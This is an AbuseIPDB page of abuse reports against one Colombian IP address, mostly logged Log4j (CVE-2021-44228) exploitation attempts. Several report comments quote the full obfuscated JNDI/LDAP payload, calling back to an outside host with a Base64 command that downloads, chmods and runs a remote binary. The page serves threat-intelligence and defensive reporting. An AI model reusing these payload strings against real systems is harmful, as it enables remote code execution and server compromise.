JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 45.145.248.35

45.145.248.35 was found in our database!

This IP was reported 61 times. Confidence of Abuse is 0%: ?

ISP	MUNDO + S.A.S.
Usage Type	Fixed Line ISP
ASN	AS274044
Domain Name	mundomas.com.co
Country	🇨🇴 Colombia
City	La Ceja, Antioquia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 45.145.248.35

Whois 45.145.248.35

IP Abuse Reports for 45.145.248.35:

This IP address has been reported a total of 61 times from 60 distinct sources. 45.145.248.35 was first reported on March 23rd 2023, and the most recent report was 3 years ago.

Old Reports: The most recent abuse report for this IP address is from 3 years ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 cybsecaoccol	2023-03-23 16:01:21 (3 years ago)	log 4j	Port Scan Hacking Web App Attack
🇺🇸 NotSure	2023-03-23 14:38:30 (3 years ago)	SERVER-OTHER Apache Log4j logging remote code execution attempt (1:300061:1) Time 2023-03-22 19:11: ... show more SERVER-OTHER Apache Log4j logging remote code execution attempt (1:300061:1) Time 2023-03-22 19:11:11, Source Port / ICMP Type 40396 / tcp, Destination Port / ICMP Code 80 (http) / tcp Callback address 107.189.4.234:1389 show less	Web App Attack
🇺🇸 HarbertsT	2023-03-23 14:37:05 (3 years ago)	----------------------------------------------------------- Apache Log4j logging remote code exec ... show more ----------------------------------------------------------- Apache Log4j logging remote code execution attempt Source: 45.145.248.35 tcp/80 t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldC Callback: 107.189.4.234 (LUXEMBOURG) ----------------------------------------------------------- show less	Hacking Web App Attack
🇨🇦 Odie'sInfoSec	2023-03-23 13:59:43 (3 years ago)	IP attempted an Apache Log4j remote code execution (CVE-2021-44228)	Hacking Web App Attack
🇫🇷 ManagedStack	2023-03-23 13:52:30 (3 years ago)	ua="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass ... show more ua="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vZDI2ZXhrZmd2eTcyamEuY2xvdWRmcm9udC5uZXQvc3BraTsgY3VybCAtTyBodHRwOi8vZDI2ZXhrZmd2eTcyamEuY2xvdWRmcm9udC5uZXQvc3BraTsgY2htb2QgNzc3IHNwa2k7IC4vc3BraSAy}')" show less	Web App Attack
Anonymous	2023-03-23 13:09:51 (3 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Port Scan Hacking
🇫🇷 geot	2023-03-23 12:38:58 (3 years ago)	GET / HTTP/1.1 Referer="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.< ... show more GET / HTTP/1.1 Referer="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.<<removed>>:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vPDxyZW1vdmVkPj4uY2xvdWRmcm9udC5uZXQvc3BraTsgY3VybCAtTyBodHRwOi8vPDxyZW1vdmVkPj4uY2xvdWRmcm9udC5uZXQvc3BraTsgY2htb2QgNzc3IHNwa2k7IC4vc3BraSAyCg==}')" show less	Port Scan SQL Injection Web App Attack
Anonymous	2023-03-23 12:38:09 (3 years ago)	[22/Mar/2023:21:55:33 -0400] \"GET / HTTP/1.1\" \"t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap ... show more [22/Mar/2023:21:55:33 -0400] \"GET / HTTP/1.1\" \"t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vZDI2ZXhrZmd2eTcyamEuY2xvdWRmcm9udC5uZXQvc3BraTsgY3VybCAtTyBodHRwOi8vZDI2ZXhrZmd2eTcyamEuY2xvdWRmcm9udC5uZXQvc3BraTsgY2htb2QgNzc3IHNwa2k7IC4vc3BraSAy}')\" show less	Hacking
Anonymous	2023-03-23 11:48:44 (3 years ago)	The following intrusion was observed: Apache.Log4j.Error.Log.Remote.Code.Execution.	Web App Attack
🇨🇭 Kepler-1649c	2023-03-23 11:46:55 (3 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Hacking
🇺🇸 gu-alvareza	2023-03-23 08:33:59 (3 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Hacking Web App Attack
🇫🇷 Security_Whaller	2023-03-23 07:33:00 (3 years ago)	Malicious Activity	Hacking Brute-Force Web App Attack
🇫🇮 tjs	2023-03-23 07:15:57 (3 years ago)	log4j attack / scan	Hacking Web App Attack
🇳🇱 NSCA-ISEU	2023-03-23 06:05:36 (3 years ago)	Zero Carbon. . Apache Log4j Remote Code Execution (CVE-2021-44228)	Port Scan Web App Attack
🇳🇿 Kiwi Bloke	2023-03-23 05:47:17 (3 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Port Scan Hacking

Showing 1 to 15 of 61 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 184.105.247.238

🇸🇬 114.119.155.180

🇷🇺 87.253.26.236

🇧🇾 81.30.98.142

🇺🇸 66.132.172.144

🇬🇧 35.203.211.213

🇺🇸 3.130.168.2

🇩🇪 167.71.56.15

🇺🇸 156.232.13.161

🇨🇳 124.67.120.106

🇹🇭 118.193.57.62

🇸🇬 101.47.25.196

🇧🇪 35.187.43.37

🇺🇸 209.54.102.172

🇺🇸 144.126.218.86

🇸🇬 124.156.204.51

🇨🇳 113.25.249.100

🇨🇳 112.86.225.120

🇯🇵 111.238.174.6

🇸🇬 104.233.44.136